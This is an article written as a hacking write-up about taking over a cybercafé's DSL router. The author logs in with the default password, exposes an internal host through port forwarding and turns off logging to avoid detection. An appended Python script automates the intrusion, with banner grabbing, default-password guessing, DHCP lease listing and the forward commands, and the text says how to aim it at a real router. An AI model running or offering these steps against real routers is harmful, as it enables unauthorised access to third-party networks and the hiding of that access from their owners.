Defeating Network Address Translation
by g00gleminer (g00gleminer@fiberia.com)
I was sitting in a cybercafé recently, day-dreaming how nice it would be to remotely access these shiny Linux boxen in front of me to hop around the net anonymously.
I gave it a shot. No shell access - someone clueful set up these hosts. I tried to shoulder surf the password out of the bored (but helpful) café worker. My eyes were too slow. D'oh!
I tried to browse / via the browser - no luck. The front door was impervious.
But I asked myself if someone had set up the "back door" with the same attention to detail. I surfed to whatismyipaddress.com and got the IP address. I made a note of it on my PDA.
Back in the lab, I poked around. The IP addy turned out to be a DSL router doing Network Address Translation (NAT) for the café's machines.
This is a pretty common setup, since it's cheap and secure - if it's set up correctly. Emphasis on the last part of the sentence.
    $ telnet 63.228.xxx.xxx
    Trying 63.228.xxx.xxx...
    Connected to 63.228.xxx.xxx.
    Escape character is '^]'.
    FlowPoint/2200 SDSL [ATM] Router fp2200-32 v3.5.1 Ready
    Login:

Lessee, could that be on a default password list?
I surfed to www.phenoelit.de/dpl/dpl.html (this site is threatened by the DMCA, incidentally) and saw the default immediately: admin (sad, but true).
    Login: admin
    Logged in successfully!

Now what?
I had to figure out a way to do some port redirection so that the FlowPoint would forward specific service traffic to the same port on internal, NAT'ed hosts. After some Google (ab)usage, I did:
    # dhcp list

and saw the IP pool of reserved, non-routable (RFC 1918) addresses handed out to the café clients upon issuing a DHCP request.
I chose one of the IPs and issued the command which would do the port forwarding from the FlowPoint to this particular internal IP address and port. I chose FTP since it comes enabled on many Linux distros.
    # rem addServer 192.168.254.19 tcp ftp wan
    # exit

Now I tried to connect to the masqueraded host:
    $ ftp 63.228.xxx.xxx
    Connected to some.cybercafe.host
    220 some.cybercafe.host FTP server ready,
    Name (some.cybercafe.host:g00gle):

Woohoo! It worked.
From here, I could do any number of things which I will leave to your imagination. Note that in getting to this point, I did not change the FlowPoint admin password, muck with DHCP leases, or generally cause unwarranted chaos.
I also took the time to restore the service to its previous unforwarded state when I was finished:
    # rem delServer 192.168.254.19 tcp ftp wan

If you try this for yourself, remember not to choose Telnet as the forwarded service, or you will lose communication with the router on subsequent connects: the forward sends inbound port 23 on the WAN side to the internal host instead of to the router's own login prompt. It would also be wise to temporarily turn logging off prior to exploration of the FlowPoint OS:

    # system log stop

Although this example worked for a cybercafé setting, you will encounter similar setups elsewhere since many people:
- Trust NAT blindly.
- Are too lazy to change default passwords.
Any DSL router that leaves its management login reachable from the WAN side with a default password, Cisco's included, gives you the same foothold, so it should be easy to do this for Cisco DSL routers as well.
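The same hunt as a script: banner grab, default-password guessing, "dhcp list", "rem addServer", and the "rem delServer" cleanup. This is an added example, not the author's code. The router it talks to is a constructed fake driven over a loopback socket so the whole thing runs offline; the greeting and prompts reproduce what the article quotes, but the "dhcp list" output format (IP plus MAC per line) and the password list are assumptions. It also refuses the Telnet forward the article warns about.

```python
import re
import socket
import threading

# Constructed strings reproducing the prompts quoted in the article.  The "dhcp list"
# output format is an assumption: the real FlowPoint format is not on the page.
BANNER = b"FlowPoint/2200 SDSL [ATM] Router fp2200-32 v3.5.1 Ready\r\nLogin:"
DHCP_LIST_OUTPUT = (b"192.168.254.19  00:a0:c9:ab:cd:ef\r\n"
                    b"192.168.254.17  00:a0:c9:12:34:56\r\n# ")
# "admin" is the default the article found on the phenoelit list; the first entry is
# a deliberate wrong guess so the retry path gets exercised.
DEFAULT_PASSWORDS = ["password", "admin"]
PRIVATE_IP = re.compile(r"\b(?:10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[01])(?:\.\d{1,3}){2})\b")

def fake_flowpoint(listener, password="admin"):
    # Stand-in for the router's telnet CLI: login prompt, then a "# " shell.
    conn, _ = listener.accept()
    with conn, conn.makefile("rb") as rfile:
        conn.sendall(BANNER)
        while rfile.readline().strip() != password.encode():
            conn.sendall(b"Login:")
        conn.sendall(b"Logged in successfully!\r\n# ")
        while True:
            line = rfile.readline().strip()
            if not line or line == b"exit":
                return
            if line == b"dhcp list":
                conn.sendall(DHCP_LIST_OUTPUT)
            elif line.startswith((b"rem addServer", b"rem delServer")):
                conn.sendall(b"OK\r\n# ")
            else:
                conn.sendall(b"# ")

def read_until(sock, markers, limit=4096):
    # Read until one of the prompt markers shows up or the peer closes.
    buf = b""
    while not any(m in buf for m in markers) and len(buf) < limit:
        chunk = sock.recv(1024)
        if not chunk:
            break
        buf += chunk
    return buf

def command(sock, line, prompt=b"# "):
    sock.sendall(line.encode() + b"\r\n")
    return read_until(sock, (prompt,)).decode(errors="replace")

def identify(banner):
    # Model and firmware from the greeting, e.g. ("FlowPoint/2200", "v3.5.1").
    m = re.search(r"(FlowPoint/\S+)\s.*?\s(v[\d.]+)", banner)
    return (m.group(1), m.group(2)) if m else None

def parse_dhcp_list(text):
    # RFC 1918 leases in order of appearance, deduplicated.
    return list(dict.fromkeys(PRIVATE_IP.findall(text)))

def forward_command(ip, service, proto="tcp", add=True):
    # The "rem addServer" / "rem delServer" line the article types by hand.
    if service.lower() in ("telnet", "23"):
        # Forwarding telnet hands the router's own management port to the inside host.
        raise ValueError("refusing to forward telnet: you would lose the router on reconnect")
    return f"rem {'addServer' if add else 'delServer'} {ip} {proto} {service} wan"

def audit(host, port, passwords=DEFAULT_PASSWORDS, service="ftp"):
    # Banner-grab, try default passwords, list leases, forward one host, then undo it.
    result = {"model": None, "password": None, "hosts": [], "forwarded": None}
    with socket.create_connection((host, port), timeout=5) as sock:
        result["model"] = identify(read_until(sock, (b"Login:",)).decode(errors="replace"))
        if result["model"] is None:
            return result
        for pw in passwords:
            sock.sendall(pw.encode() + b"\r\n")
            if b"Logged in successfully" in read_until(sock, (b"# ", b"Login:")):
                result["password"] = pw
                break
        else:
            return result
        result["hosts"] = parse_dhcp_list(command(sock, "dhcp list"))
        if result["hosts"]:
            target = result["hosts"][0]
            command(sock, forward_command(target, service))
            result["forwarded"] = target
            command(sock, forward_command(target, service, add=False))  # restore, as the article did
        sock.sendall(b"exit\r\n")
    return result

def demo():
    # Run audit() against the fake router on a loopback port.
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    t = threading.Thread(target=fake_flowpoint, args=(listener,), daemon=True)
    t.start()
    try:
        return audit("127.0.0.1", listener.getsockname()[1])
    finally:
        t.join(timeout=5)
        listener.close()

if __name__ == "__main__":
    print(demo())
```

Against a real router you would point audit() at the public address and port 23 instead of demo(); the forward is removed in the same session so the box is left as it was found, and the only state that lingers is the login in the router's log, which is why the article stops logging first.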